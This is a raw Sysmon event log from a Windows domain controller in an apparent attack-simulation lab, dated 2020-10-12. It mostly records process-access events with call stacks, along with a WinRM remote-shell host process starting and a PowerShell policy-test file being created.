08:42:01.120{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002728Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.120{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002727Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.120{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002726Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.120{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002725Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.120{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002724Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.120{5D479F2C-169F-5F84-0500-000000007F01}6482424C:\Windows\system32\csrss.exe{5D479F2C-16D9-5F84-8000-000000007F01}4236C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002723Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.120{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16D9-5F84-8000-000000007F01}4236C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002722Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.129{5D479F2C-16D9-5F84-8000-000000007F01}4236C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{5D479F2C-16D9-5F84-91E5-040000000000}0x4e5910HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{5D479F2C-16A1-5F84-0C00-000000007F01}612C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000002721Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.120{5D479F2C-169F-5F84-0B00-000000007F01}8641112C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002720Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.120{5D479F2C-169F-5F84-0B00-000000007F01}8641112C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002719Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.120{5D479F2C-169F-5F84-0B00-000000007F01}8641112C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 11241100x80000000000000002813Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:02.651{5D479F2C-16D9-5F84-8400-000000007F01}4376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_n1gk03dg.l4c.ps12020-10-12 08:42:02.651 10341000x80000000000000002812Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:02.323{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002811Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:02.323{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002810Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:02.323{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002809Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.995{5D479F2C-169F-5F84-0B00-000000007F01}8641112C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002808Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.995{5D479F2C-169F-5F84-0B00-000000007F01}8641112C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002857Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:06.995{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002856Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:06.995{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002855Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:06.995{5D479F2C-169F-5F84-0B00-000000007F01}8641112C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002854Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:06.714{5D479F2C-16DE-5F84-8700-000000007F01}46244464C:\Windows\system32\conhost.exe{5D479F2C-16DE-5F84-8900-000000007F01}4844C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002853Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:06.714{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002852Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:06.714{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002851Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:06.714{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002850Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:06.714{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002849Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:06.714{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4